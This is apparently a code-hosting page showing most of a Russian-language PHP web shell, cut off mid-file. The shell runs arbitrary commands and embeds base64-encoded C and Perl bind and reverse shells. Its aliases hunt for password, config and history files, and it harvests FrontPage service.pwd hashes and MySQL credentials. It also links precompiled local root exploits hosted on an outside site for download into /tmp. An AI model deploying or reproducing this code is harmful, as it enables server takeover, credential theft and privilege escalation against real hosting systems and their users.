/xakep-shells/PHP/nixrem.php.php.txt
Plain Text | 1772 lines | 1602 code | 170 blank | 0 comment | 0 complexity | d9e10daa08c908b3431cb30e74b7e6b4 MD5 | raw file
Possible License(s): AGPL-1.0, GPL-2.0
Large files files are truncated, but you can click here to view the full file
- <?php
- #########################################################
- # NIX REMOTE WEB SHELL #
- # Coded by DreAmeRz Ver 1.0 #
- # ORIGINAL E-MAIL IS: dreamerz@mail.ru #
- #
- #########################################################
- $name="1"; // логин пользователя
- $pass="1"; // пароль пользователя
- if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
- {
- header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
- header("HTTP/1.0 401 Unauthorized");
- exit("Access Denied");
- }
- ?>
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
- <html>
- <head>
- <title>NIX REMOTE WEB-SHELL v.1.0</title>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
- <meta http-equiv="pragma" content="no-cache">
- <meta http-equiv="Content-Language" content="en,ru">
- <META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
- <style type="text/css">
- BODY, TD, TR {
- text-decoration: none;
- font-family: Verdana;
- font-size: 8pt;
- scrollbar-face-color: #FFFFFF;
- scrollbar-shadow-color:#000000 ;
- scrollbar-highlight-color:#FFFFFF;
- scrollbar-3dlight-color: #000000;
- scrollbar-darkshadow-color:#FFFFFF ;
- scrollbar-track-color: #FFFFFF;
- scrollbar-arrow-color: #000000;
- }
- input, textarea, select {
- font-family: Verdana;
- font-size: 10px;
- color: black;
- background-color: red;
- border: solid 1px;
- border-color: black
- }
- UNKNOWN {
- COLOR: black;
- TEXT-DECORATION: none
- }
- A:link {COLOR:black; TEXT-DECORATION: none}
- A:visited { COLOR:black; TEXT-DECORATION: none}
- A:active {COLOR:black; TEXT-DECORATION: none}
- A:hover {color:blue;TEXT-DECORATION: none}
- </STYLE>
- </HEAD>
- <BODY bgcolor="#fffcf9" text="#000000">
- <P align=center>[ <A href="javascript:history.next(+1)">Вперед ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
- v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Назад ]</A>[ <A href="?ac=about" title='Что умеет скрипт...'>О скрипте ]</a><BR>
- <A href="?ac=info" title='Узнай все об этой системе!'>[ Информация о системе</A> ][ <A href="?ac=navigation" title='Удобная графическая навигация. Просмотр, редактирование...'>Навигация</A> ][ <A href="?ac=backconnect" title='Установка backconnect и обычного бекдора '>Установка
- бекдора</A> ][ <A href="?ac=eval" title='Создай свой скрипт на php прямо здесь :)'>PHP-код</A> ][ <A href="?ac=upload" title='Загрузка одного файла, масcовая загрузка, загрузка файлов с удаленного компьютера!'>Загрузка файлов</A> ][ <A href="?ac=shell" title='bash shell, альясы...'>Исполнение
- команд ]</A> <br><A href="?ac=sql" title='Работа с MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Отправь е-mail отсюда!'>[ Отправка письма</A> ][ <A href="?ac=mailfluder" title='Тебя кто-то достал? Тогда тебе сюда...'>Маилфлудер</A>
- ][ <A href="?ac=tools" title='Кодировщики/декодировщики md5, des, sha1, base64... '>Инструменты ]</A>[ <A href="?ac=ps" title='Отображает список процессов на сервере и позволяет их убивать!'>Демоны</A> ][ <A href="?ac=art" title='Альтернативные методы взлома...'>Альтернативные методы</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Надоел этот сервер? Тогда можно удалить и шелл...'>Удалить шелл</A> ]</P>
- <?php
- if (ini_get('register_globals') != '1') {
- if (!empty($HTTP_POST_VARS))
- extract($HTTP_POST_VARS);
- if (!empty($HTTP_GET_VARS))
- extract($HTTP_GET_VARS);
- if (!empty($HTTP_SERVER_VARS))
- extract($HTTP_SERVER_VARS);
- }
- Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
- set_magic_quotes_runtime(0);
- set_time_limit(0); // убрать ограничение по времени
- ignore_user_abort(1); // игнорировать разрыв связи с браузером
- error_reporting(0);
- $self = $_SERVER['PHP_SELF'];
- $docr = $_SERVER['DOCUMENT_ROOT'];
- $sern = $_SERVER['SERVER_NAME'];
- if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
- $aliases=array(
- '------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
- 'поиск на сервере всех файлов со suid-битом' => 'find / -type f -perm -04000 -ls',
- 'поиск на сервере всех файлов со sgid-битом' => 'find / -type f -perm -02000 -ls',
- 'поиск в текущей директории всех файлов со sgid-битом' => 'find . -type f -perm -02000 -ls',
- 'поиск на сервере файлов config' => 'find / -type f -name "config*"',
- 'поиск на сервере файлов admin' => 'find / -type f -name "admin*"',
- 'поиск в текущей директории файлов config' => 'find . -type f -name "config*"',
- 'поиск в текущей директории файлов pass' => 'find . -type f -name "pass*"',
- 'поиск на сервере всех директорий и файлов, открытых для записи' => 'find / -perm -2 -ls',
- 'поиск в текущей директории всех директорий и файлов, открытых для записи' => 'find . -perm -2 -ls',
- 'поиск в текущей директории файлов service.pwd' => 'find . -type f -name service.pwd',
- 'поиск на сервере файлов service.pwd' => 'find / -type f -name service.pwd',
- 'поиск на сервере файлов .htpasswd' => 'find / -type f -name .htpasswd',
- 'поиск в текущей директории файлов .htpasswd' => 'find . -type f -name .htpasswd',
- 'поиск всех файлов .bash_history' => 'find / -type f -name .bash_history',
- 'поиск в текущей директории файлов .bash_history' => 'find . -type f -name .bash_history',
- 'поиск всех файлов .fetchmailrc' => 'find / -type f -name .fetchmailrc',
- 'поиск в текущей директории файлов .fetchmailrc' => 'find . -type f -name .fetchmailrc',
- 'вывод списка атрибутов файлов на файловой системе ext2fs' => 'lsattr -va',
- 'просмотр открытых портов' => 'netstat -an | grep -i listen',
- 'поиск всех php-файлов со словом password' =>'find / -name *.php | xargs grep -li password',
- 'поиск папок с модом 777' =>'find / -type d -perm 0777',
- 'Определение версии ОС' =>'sysctl -a | grep version',
- 'Определение версии ядра' =>'cat /proc/version',
- 'Просмотр syslog.conf' =>'cat /etc/syslog.conf',
- 'Просмотр Message of the day' =>'cat /etc/motd',
- 'Просмотр hosts' =>'cat /etc/hosts',
- 'Версия дистрибутива 1' =>'cat /etc/issue.net',
- 'Версия дистрибутива 2' =>'cat /etc/*-realise',
- 'Показать все процесы' =>'ps auxw',
- 'Процессы текущего пользователя' =>'ps ux',
- 'Поиск httpd.conf' =>'locate httpd.conf');
- /* Port bind source */
- $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
- jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
- ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
- 0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
- mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
- KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
- hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
- OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
- rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
- kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
- 7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
- wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
- 6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
- hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
- pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
- sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
- 0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
- lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
- 9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
- pDQpyZXR1cm4gMDsNCn0=";
- $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
- AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
- NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
- QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
- pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
- JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
- 0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
- FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
- YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
- NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
- 9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
- $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
- HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
- DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
- HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
- CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
- GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
- WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
- iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
- VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
- FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
- $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
- KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
- pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
- ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
- uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
- 9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
- zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
- QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
- sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
- pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
- zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
- sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
- if(isset($uploadphp))
- {
- $socket=fsockopen($iphost,$loadport); //connect
- fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request
- while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
- unset($buffer); }
- while(!feof($socket)) $buffer.=fread($socket, 1024);
- $file_size=strlen($buffer);
- $f=fopen($loadnewname,"wb+");
- fwrite($f, $buffer, $file_size);
- echo "Размер загруженного файла: $file_size <b><br><br>" ;
- }
- if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
- elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- else {$ac = "navigation";}
- switch($ac) {
- // Shell
- case "shell":
- echo "<SCRIPT LANGUAGE='JavaScript'>
- <!--
- function pi(str) {
- document.command.cmd.value = str;
- document.command.cmd.focus();
- }
- //-->
- </SCRIPT>";
- /* command execute */
- if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
- if (($_POST['alias']) AND ($_POST['alias']!==""))
- {
- foreach ($aliases as $alias_name=>$alias_cmd) {
- if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
- }
- }
- echo "<font face=Verdana size=-2>Выполненная команда: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
- echo "<b>";
- echo "<div align=center><textarea name=report cols=145 rows=20>";
- echo "".passthru($_POST['cmd'])."";
- echo "</textarea></div>";
- echo "</b>";
- ?>
- </td></tr>
- <tr><b><div align=center>:: Выполнение команд на сервере ::</div></b></font></td></tr>
- <tr><td height=23>
- <TR>
- <CENTER>
- <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
- <TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
- <TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
- <TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
- <TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
- <TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
- <TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
- <TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
- <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
- <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
- <TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD>
- <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
- <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
- <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
- <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
- </CENTER>
- </TR>
- <?
- /* command execute form */
- echo "<form name=command method=post>";
- echo "<b>Выполнить команду</b>";
- echo "<input type=text name=cmd size=85><br>";
- echo "<b>Рабочая директория </b>";
- if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
- else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
- echo "<input type=submit name=submit value=Выполнить>";
- echo "</form>";
- /* aliases form */
- echo "<form name=aliases method=POST>";
- echo "<font face=Verdana size=-2>";
- echo "<b> Выберите алиас<font face=Wingdings color=gray></font> </b>";
- echo "<select name=alias>";
- foreach ($aliases as $alias_name=>$alias_cmd)
- {
- echo "<option>$alias_name</option>";
- }
- echo "</select>";
- if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
- else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
- echo " <input type=submit name=submit value=Выполнить>";
- echo "</font>";
- echo "</form>";
- break;
- case "art":
- echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
- Эксплойт для FrontPage. Собирает читаемые .htpassword файлы по всему серверу. Позволяет создать нехилую базу всех сайтов в виде логин:пароль от хостера, то есть пароли к FrontPage подходят к FTP и другим сервисам сервера. Рассшифровка производится с помощью John The Ripper (Standart/DES).<br><br>
- <a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
- Эксплоит, позволяющий облегчить поиск паролей к базе данных. Производится поиск файлов с упоминанием ряда строк, указывающих на коннект к MySQL. Также возможно совпадение паролей с другими сервисами сервера. Пароли в большенстве случаев или вовсе не зашифрованы, или зашифрованы обратимым алгоритмом. Проанализировав файлы, указанные эксплоитом, вы быстро найдете пароль к MySQL.<br><br>
- <a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
- Полноценный брутфорсер, работающий по методу подстановки паролей, которые берет из файла. Файл генерируется сам, вы только указываете число паролей и... все - перебор начинается!!! С помощью данного брутфорсера вы сможете подобрать пароль к любому хостингу без проблем! Чтобы было что перебирать, была добавлена база паролей, которая генерируется на лету (не пишите большие цифры в количестве паролей, так как это серьезная нагрузка на сервер! 10000 вполне хватит).<br><br>
- <a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
- Эксплоит позволяет перебрать аккаунт на FTP на связку login:login. Чем больше юзеров в /etc/passwd, тем больше вероятность удачной работы эксплоита.<br><br>
- <a href='?ac=shell'><b>Некоторые другие мини-эксплоиты приведены здесь в альясах.</b></a><br>";
- break;
- case "frontpage":
- $p=getenv("DOCUMENT_ROOT");
- if(exec("cat /etc/passwd")){
- $ex=explode("/", $p);
- $do_login=substr($p,0,strpos($p,$ex[2]));
- $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
- exec("cat /etc/passwd", $passwd);
- for($i=0; $i<=count($passwd); $i++) {
- $xz=explode(":", $passwd[$i]);
- $file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
- if(exec("cat ".$file)){
- exec("cat ".$file,$open);
- $a=$open[count($open)-1];
- $fr=strpos($a, ":");
- $open1=substr($a, $fr);
- if($xz[4]=='') {
- $file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
- Unset($domain);
- exec("cat ".$file1,$domain);
- $domain1=explode(" ",$domain[8]);
- $xz[4]=$domain1[1];
- }
- echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
- } }
- }
- elseif(is_file("/etc/passwd")){
- $ex=explode("/", $p);
- $passwd="/etc/passwd";
- echo "Путь: ".$p."<br>";
- $do_login=substr($p,0,strpos($p,$ex[2]));
- $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
- if(is_file($passwd)) {
- $open=fopen($passwd,"r");
- while (!feof($open)) {
- $str=fgets($open, 100);
- $mas=explode(":", $str);
- $file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
- if(is_file($file)) {
- echo $mas[0];
- $open1=fopen($file, "r");
- $str1=fread($open1,filesize($file));
- fclose($open1);
- $fr=strpos($str1, ":");
- $str2=substr($str1, $fr);
- $str2=rtrim($str2);
- //
- if($mas[4]=='') {
- $file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
- $open2=fopen($file1,"r");
- $domain=fread($open2,filesize($file1));
- fclose($open2);
- $domain1=substr($domain,106,110);
- $domain2=explode("AuthUserFile",$domain1);
- $mas[4]=$domain2[0];
- }
- //
- echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
- }
- }
- fclose($open);
- }
- }
- else{
- echo "С пассом облом :(((";
- }
- break;
- case "dbexploit":
- echo "<PRE>";
- echo "<b>В файле присутствует функция mysql_connect: </b><br>";
- exec("find / -name *.php | xargs grep -li mysql_connect");
- exec("find / -name *.inc | xargs grep -li mysql_connect");
- exec("find / -name *.inc.php | xargs grep -li mysql_connect");
- echo "<b>В файле присутствует функция mysql_select_db: </b><br>";
- exec("find / -name *.php | xargs grep -li mysql_select_db");
- exec("find / -name *.inc | xargs grep -li mysql_select_db");
- exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
- echo "<b>В файле присутствует упоминание пароля: </b><br>";
- exec("find / -name *.php | xargs grep -li $password");
- exec("find / -name *.inc | xargs grep -li $password");
- exec("find / -name *.inc.php | xargs grep -li $password");
- exec("find / -name *.php | xargs grep -li $pass");
- exec("find / -name *.inc | xargs grep -li $pass");
- exec("find / -name *.inc.php | xargs grep -li $pass");
- echo "<b>В файле присутствует слово localhost: </b><br>";
- exec("find / -name *.php | xargs grep -li localhost");
- exec("find / -name *.inc | xargs grep -li localhost");
- exec("find / -name *.inc.php | xargs grep -li localhost");
- echo "</PRE>";
- break;
- // список процессов
- case "ps":
- echo "<b>Процессы в системе:</b><br>";
-
- echo "<br>";
- if ($pid)
- {
- if (!$sig) {$sig = 9;}
- echo "Отправление команды ".$sig." to #".$pid."... ";
- $ret = posix_kill($pid,$sig);
- if ($ret) {echo "Все, процесс убит, аминь";}
- else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
- }
- $ret = `ps -aux`;
- if (!$ret) {echo "Невозможно отобразить список процессов! Видно, злой админ запретил ps";}
- else
- {
- $ret = htmlspecialchars($ret);
- while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
- $stack = explode("\n",$ret);
- $head = explode(" ",$stack[0]);
- unset($stack[0]);
- if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
- if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
- $k = $ps_aux_sort[0];
- if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
- else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
- for($i=0;$i<count($head);$i++)
- {
- if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
- }
- $prcs = array();
- foreach ($stack as $line)
- {
- if (!empty($line))
- {
- echo "<tr>";
- $line = explode(" ",$line);
- $line[10] = join(" ",array_slice($line,10,count($line)));
- $line = array_slice($line,0,11);
- $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- $head[$k] = "<b>".$head[$k]."</b>".$y;
- $head[] = "<b>ACTION</b>";
- $v = $ps_aux_sort[0];
- usort($prcs,"tabsort");
- if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
- $tab = array();
- $tab[] = $head;
- $tab = array_merge($tab,$prcs);
- echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
- foreach($tab as $k)
- {
- echo "<tr>";
- foreach($k as $v) {echo "<td>".$v."</td>";}
- echo "</tr>";
- }
- echo "</table>";
- }
- break;
- // exploits for root...
- case "exploits":
- // thanks to xoce
- $public_site = "http://hackru.info/adm/exploits/public_exploits";
- $private_site = "http://hackru.info/adm/exploits/private_exploits";
- echo"Этот раздел создан по ряду причин. Во-первых, уже надоело искать одни и теже эксплоиты, во-вторых - компилирование и исправление сорцов под конкретную платформу уже тоже не приносит удовольствия. Все эксплоиты скомпилированы и настроены. Самому компилировать было влом, поэтому воспользовался готовыми :) Выражаю благодарность xoce (hackru.info)<br><br>
- <a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
- <a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
- <a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
- <a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
- <a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
- <a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
- <a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
- <a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
- echo "Использование: заходите в /tmp из bash шелла и запускайте файлы запуска.<br>
- Пример: cd /tmp; ./m - все, эксплоит запустится, и если все ok, то вы получите права root'a!<br>
- Если здесь не оказалось подходящего эксплоита, то посетите <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> и <a href=http://security.nnov.ru>security.nnov.ru</a>.";
- break;
- case "damp":
- if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
- if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
- $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
- if($db)
- {
- if(@mysql_select_db($_POST['mysql_db'],$db))
- {
- // инфа о дампе
- $sql1 = "# MySQL dump created by NRWS\r\n";
- $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
- $sql1 .= "# ---------------------------------\r\n";
- $sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
- $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
- $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
- $sql1 .= "# ---------------------------------\r\n\r\n";
- // получаем текст запроса создания структуры таблицы
- $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
- $row = @mysql_fetch_row($res);
- $sql1 .= $row[1]."\r\n\r\n";
- $sql1 .= "# ---------------------------------\r\n\r\n";
- $sql2 = '';
- // получаем данные таблицы
- $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
- if (@mysql_num_rows($res) > 0) {
- while ($row = @mysql_fetch_assoc($res)) {
- $keys = @implode("`, `", @array_keys($row));
- $values = @array_values($row);
- foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
- $values = @implode("', '", $values);
- $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
- }
- $sql2 .= "\r\n# ---------------------------------";
- }
- echo "<center><b>Готово! Дамп прошел удачно!</b></center>";
- // пишем в файл или выводим в браузер
- if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- else { echo $sql1.$sql2; }
- } // end if(@mysql_select_db($_POST['mysql_db'],$db))
- else echo "Такой БД нет!";
- @mysql_close($db);
- } // end if($db)
- else echo "Нет коннекта c сервером!";
- } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
- else if(!empty($_POST['dif'])&&!$fp) { echo "ОШИБКА, нет прав записи в файл!"; }
- break;
- // SQL Attack
- case "sql":
- echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
- echo " База: <input type=text name=mysql_db size=15 value=";
- echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
